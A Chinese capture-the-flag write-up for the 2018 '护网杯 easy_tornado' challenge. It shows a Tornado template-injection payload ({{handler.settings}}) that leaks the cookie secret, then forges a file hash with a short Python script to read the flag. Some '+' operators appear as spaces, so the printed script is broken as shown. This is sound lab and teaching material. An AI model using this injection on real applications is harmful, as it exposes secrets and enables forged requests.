[护网杯 2018]easy_tornado 1(两种解法!)

2023-11-13 09:26:01 浏览数 (4)

题目环境:

发现有三个txt文本文件

/flag.txt /welcome.txt /hints.txt

依此点开

flag在/fllllllllllllag文件中

在hints.txt文件中发现md5计算 md5(cookie_secret md5(filename))

并且三个文件中都存在filehash(文件名被哈希算法加密32位小写)

猜测解题关键点在md5(cookie_secret md5(filename))这里 首先flag在/fllllllllllllag文件中**,所以就是filename=/fllllllllllllag;**filehash=md5(cookie_secret md5(filename)) 现在只缺cookie_secret这个东西,只要有了cookie_secret再通过这个md5(cookie_secret md5(filename))公式进行计算即可获取到flag

注意题目easy_tornado 1;tornado是python的一个模板,可以看出这道题是模板注入类的题目

改哈希值看看是否有变化

回车

模板注入必须通过传输型如{{xxx}}的执行命令

果然是tornado模板注入

在tornado模板中,存在一些可以访问的快速对象,这里用到的是handler.settings,handler 指向RequestHandler,而RequestHandler.settings又指向self.application.settings,所以handler.settings就指向RequestHandler.application.settings了,这里面就是我们的一些环境变量。

简单理解handler.settings即可,可以把它理解为tornado模板中内置的环境配置信息名称,通过handler.settings可以访问到环境配置的一些信息,看到tornado模板基本上可以通过handler.settings一把梭。

爆cookie_secret error?msg={{handler.settings}}

得到cookie_secret 76fc62a3-fea5-46ab-8f95-4b7262246f8c 按照公式进行加密

/fllllllllllllag=3bf9f6cf685a6dd8defadabfb41a03a1 cookie_secret md5(filename) 76fc62a3-fea5-46ab-8f95-4b7262246f8c3bf9f6cf685a6dd8defadabfb41a03a1

md5(cookie_secret md5(filename)) 39482391ef4cc45a75262be45e94c725 最终payload: ?filename=/fllllllllllllag&filehash=39482391ef4cc45a75262be45e94c725

当然也可以用python脚本进行加密

代码语言:javascript复制
import hashlib  #选用哈希模块
filename = '/fllllllllllllag'  #文件名
cookie_secret = '76fc62a3-fea5-46ab-8f95-4b7262246f8c'#cookie_secret值
filename = hashlib.md5(filename.encode()).hexdigest()#/fllllllllllllag进行32位小写哈希md5加密
a = cookie_secret   filename#md5值进行拼接
filehash = hashlib.md5(a.encode()).hexdigest()#计算拼接后的md5值的md532小写的值
print(filehash)#输出加密后的md532位小写的值
代码语言:javascript复制

得到flag:
flag{5ae1c44d-f83a-4005-a69b-a1ea133391db}

0 人点赞